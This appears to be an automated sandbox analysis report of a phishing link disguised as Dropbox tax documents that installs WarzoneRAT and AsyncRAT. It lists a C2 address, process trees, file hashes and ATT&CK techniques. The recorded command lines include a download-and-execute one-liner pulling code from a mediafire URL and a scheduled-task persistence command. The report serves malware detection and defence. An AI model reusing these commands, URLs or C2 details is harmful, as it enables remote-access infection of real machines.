Analysis

  • max time kernel
    184s
  • max time network
    210s
  • platform
    windows10_x64
  • resource
    win10-20220331-en
  • submitted
    04-04-2022 20:19

General

  • Target

    https://dropbox-files.app.link/Tax_documents

Malware Config

Extracted

Family

warzonerat

C2

mobibanewdan.duckdns.org:786

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

    suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

  • Async RAT payload 3 IoCs
  • Warzone RAT Payload 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 17 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • NTFS ADS 1 IoCs
  • Office document contains embedded OLE objects 1 IoCs

    Detected embedded OLE objects in Office documents.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://dropbox-files.app.link/Tax_documents
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://dropbox-files.app.link/Tax_documents
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.0.55670659\933093013" -parentBuildID 20200403170909 -prefsHandle 1532 -prefMapHandle 1524 -prefsLen 1 -prefMapSize 220055 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 1612 gpu
        3⤵
          PID:2112
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.1.1014547707\438174884" -childID 1 -isForBrowser -prefsHandle 2160 -prefMapHandle 2156 -prefsLen 122 -prefMapSize 220055 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 2172 tab
          3⤵
            PID:5040
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2748.13.226961045\1275965387" -childID 2 -isForBrowser -prefsHandle 3204 -prefMapHandle 3500 -prefsLen 6904 -prefMapSize 220055 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2748 "\\.\pipe\gecko-crash-server-pipe.2748" 3520 tab
            3⤵
              PID:4108
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            2⤵
            • Checks processor information in registry
            PID:5012
        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Tax_Documents.docx" /o ""
          1⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          PID:4264
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:2640
          • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
            "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
            1⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of SetWindowsHookEx
            PID:5012
          • C:\Windows\system32\wscript.exe
            wscript C:\Users\Public\update.js
            1⤵
            • Process spawned unexpected child process
            PID:4120
          • C:\ProgramData\ddond.com
            C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
            1⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:3856
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
              2⤵
              • Creates scheduled task(s)
              PID:2816
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1572
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1980
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4300
          • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
            "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
            1⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of SetWindowsHookEx
            PID:1236
          • C:\ProgramData\ESETNONU.com
            C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3880
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.cmdline"
              2⤵
                PID:3356
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp" "c:\Users\Admin\AppData\Local\Temp\jykbijxl\CSCA578ABDCEAB40CB886D1F9761B6B58.TMP"
                  3⤵
                    PID:3208
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                  2⤵
                    PID:752
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 176
                      3⤵
                      • Program crash
                      PID:2172
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                    2⤵
                      PID:3936
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 536
                        3⤵
                        • Program crash
                        PID:2196
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                      2⤵
                        PID:3392
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 536
                          3⤵
                          • Program crash
                          PID:428
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                        2⤵
                          PID:5012
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 536
                            3⤵
                            • Program crash
                            PID:1932
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                          2⤵
                            PID:1372
                          • C:\ProgramData\hahahha.sdasd~txt
                            "C:\ProgramData\hahahha.sdasd~txt"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2856

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Execution

                        Scheduled Task

                        1
                        T1053

                        Persistence

                        Scheduled Task

                        1
                        T1053

                        Privilege Escalation

                        Scheduled Task

                        1
                        T1053

                        Defense Evasion

                        Install Root Certificate

                        1
                        T1130

                        Modify Registry

                        1
                        T1112

                        Discovery

                        System Information Discovery

                        3
                        T1082

                        Query Registry

                        2
                        T1012

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\ESETNONU.com
                          Filesize

                          435KB

                          MD5

                          f7722b62b4014e0c50adfa9d60cafa1c

                          SHA1

                          f31c17e0453f27be85730e316840f11522ddec3e

                          SHA256

                          ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                          SHA512

                          7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

                        • C:\ProgramData\ddond.com
                          Filesize

                          14KB

                          MD5

                          98447a7f26ee9dac6b806924d6e21c90

                          SHA1

                          a67909346a56289b7087821437efcaa51da3b083

                          SHA256

                          c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

                          SHA512

                          c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

                        • C:\ProgramData\ddond.com
                          Filesize

                          14KB

                          MD5

                          98447a7f26ee9dac6b806924d6e21c90

                          SHA1

                          a67909346a56289b7087821437efcaa51da3b083

                          SHA256

                          c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

                          SHA512

                          c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

                        • C:\ProgramData\hahahha.sdasd~txt
                          Filesize

                          313KB

                          MD5

                          55f92c397772b28ca0cd110a47cdef66

                          SHA1

                          d848821c21e08eacfbd531d64039bdb02888667b

                          SHA256

                          f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

                          SHA512

                          afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

                        • C:\ProgramData\hahahha.sdasd~txt
                          Filesize

                          313KB

                          MD5

                          55f92c397772b28ca0cd110a47cdef66

                          SHA1

                          d848821c21e08eacfbd531d64039bdb02888667b

                          SHA256

                          f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

                          SHA512

                          afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

                        • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9D527155-824E-4415-AA6A-00892BCC3AA3
                          Filesize

                          142KB

                          MD5

                          4039c07d407242d334ca1894e31b72c1

                          SHA1

                          3739f5bad3ef35a72b13788a8269542a5ecca64e

                          SHA256

                          d3ded76046aca6183dda52e597a7b83b8386b44f51ad0caef27b016650ebac7f

                          SHA512

                          1b9637fb9c8d8936e75593850f869ef9ad934c74c09940dbbad18297dbf168e9cba774d4371883ed831e83b43e0bb8ecf9afbfcf16910598c4258398664a468f

                        • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
                          Filesize

                          303KB

                          MD5

                          0e73fd13113616785de72a65790702a0

                          SHA1

                          004e11d2babe327942e19845c288bb42d885549f

                          SHA256

                          e22214c59a03a88a42a3e62270b9eff765e95e68b6f4cc03e1f0d0ee638b0266

                          SHA512

                          845cf0ecb6fb6b7ed73d9b21957f5a50d8fe8c62d3aa5211d43f24d47f1eb3a041bb84cc9373272c959c33ca0eba643dbec161319dbba7b3dec37ab241b32da3

                        • C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp
                          Filesize

                          1KB

                          MD5

                          547c51ab7f975683344d84a4bd2ff85a

                          SHA1

                          f052b59d51428f7fd6a6dc6b221884d069c44023

                          SHA256

                          6e9f0be8f6ba1576bbbb8bb847db43936e358e02b880f4f556bc048639f25a0c

                          SHA512

                          25285dbb59086ccf14ea006e2c341dd404f4c0526dcc861345d36e72532b9acf25016d20c5f720ac5f0d53f531f8c75ae9120bb9f82fa38f4e9dfc44e70292e5

                        • C:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.dll
                          Filesize

                          3KB

                          MD5

                          5b9cb7454aef64cd6207f3b2075084bf

                          SHA1

                          39ffae38556a112d5ed4a80a4389eea9b808be12

                          SHA256

                          6a4a8436d94616f192ed8094fbac2377a503a62a304462d71f9499bf63f2e429

                          SHA512

                          e1024895612b0840793e87ec799263a7417804ede9e0ec7dba5f137e3969e5635dca7f3282895a8f71ee39cac12ff9223ad9cc56dd0a660a8bc454a391d0ae2b

                        • C:\Users\Admin\Downloads\Tax_Documents.docx
                          Filesize

                          290KB

                          MD5

                          e7bc410788af86fe5e41695dd0ae308b

                          SHA1

                          8d9f55c90db961ea66993fd03e148b0dc9bcec5b

                          SHA256

                          8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

                          SHA512

                          2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

                        • C:\Users\Public\update.js
                          Filesize

                          1KB

                          MD5

                          b2a6eb01401e4a297b4e97a197af123d

                          SHA1

                          fb7334316dd8b4eba10121b023e7e35d68a8e6a6

                          SHA256

                          8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

                          SHA512

                          b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

                        • \??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\CSCA578ABDCEAB40CB886D1F9761B6B58.TMP
                          Filesize

                          652B

                          MD5

                          c101d8d0b03add4e2b7b25d126205229

                          SHA1

                          c4e40c972c56a98761fcecd845c3791c35adac39

                          SHA256

                          e2e1ac7b27d44aab6f2e819ccbe9dc1e2bfe851585a316e45b0741b73450f8f6

                          SHA512

                          3ee9d5cf51a8277f6a10e8453f18b27552d2658f84317092cead586515e46a131c028f667c6f384b9673268b3418adba99e0853404527b712966208fb3c30458

                        • \??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.0.cs
                          Filesize

                          840B

                          MD5

                          268033bad46157d9949101dfdbd69f95

                          SHA1

                          14a7532c9470d058536ff71251abc55320dee08e

                          SHA256

                          17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

                          SHA512

                          09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

                        • \??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.cmdline
                          Filesize

                          369B

                          MD5

                          2ed8c1590e8180be4d31fa075dc39612

                          SHA1

                          0c7b165d38adfd120513e0f48b5e4273cc08654a

                          SHA256

                          4321651b6ea8fbdf01bc7500abab7027164755ab39591468479f847009416987

                          SHA512

                          d64e43b146fbfdb3070209bff9f8c04ea0e1ec405367d8beabe874c10c565339cd4189c7277b6ec8ec52b01f7ee89b1eb255f4a147fd15291ff08527beb96f83

                        • memory/752-376-0x0000000000400000-0x0000000000554000-memory.dmp
                          Filesize

                          1.3MB

                        • memory/752-371-0x0000000000405CE2-mapping.dmp
                        • memory/752-370-0x0000000000400000-0x0000000000554000-memory.dmp
                          Filesize

                          1.3MB

                        • memory/1372-395-0x0000000000405CE2-mapping.dmp
                        • memory/1572-339-0x0000000000000000-mapping.dmp
                        • memory/1980-341-0x0000000000000000-mapping.dmp
                        • memory/2640-255-0x0000000000000000-mapping.dmp
                        • memory/2816-338-0x0000000000000000-mapping.dmp
                        • memory/2856-405-0x0000000000000000-mapping.dmp
                        • memory/2856-408-0x00000000001C0000-0x0000000000214000-memory.dmp
                          Filesize

                          336KB

                        • memory/2856-410-0x0000000002120000-0x0000000002132000-memory.dmp
                          Filesize

                          72KB

                        • memory/2856-412-0x0000000002180000-0x00000000021BE000-memory.dmp
                          Filesize

                          248KB

                        • memory/2856-411-0x0000000002250000-0x0000000002252000-memory.dmp
                          Filesize

                          8KB

                        • memory/2856-413-0x0000000002252000-0x0000000002254000-memory.dmp
                          Filesize

                          8KB

                        • memory/3208-362-0x0000000000000000-mapping.dmp
                        • memory/3356-359-0x0000000000000000-mapping.dmp
                        • memory/3392-383-0x0000000000405CE2-mapping.dmp
                        • memory/3880-354-0x000002399E2E6000-0x000002399E2E8000-memory.dmp
                          Filesize

                          8KB

                        • memory/3880-346-0x000002399E2F0000-0x000002399E312000-memory.dmp
                          Filesize

                          136KB

                        • memory/3880-369-0x000002399E420000-0x000002399E436000-memory.dmp
                          Filesize

                          88KB

                        • memory/3880-366-0x000002399E2D0000-0x000002399E2D8000-memory.dmp
                          Filesize

                          32KB

                        • memory/3880-351-0x000002399E2E3000-0x000002399E2E5000-memory.dmp
                          Filesize

                          8KB

                        • memory/3880-350-0x000002399E2E0000-0x000002399E2E2000-memory.dmp
                          Filesize

                          8KB

                        • memory/3880-349-0x000002399E4A0000-0x000002399E516000-memory.dmp
                          Filesize

                          472KB

                        • memory/3936-377-0x0000000000405CE2-mapping.dmp
                        • memory/4264-116-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4264-118-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4264-119-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4264-117-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4300-343-0x0000000000000000-mapping.dmp
                        • memory/5012-389-0x0000000000405CE2-mapping.dmp
                        • memory/5012-333-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/5012-330-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/5012-332-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/5012-329-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp
                          Filesize

                          64KB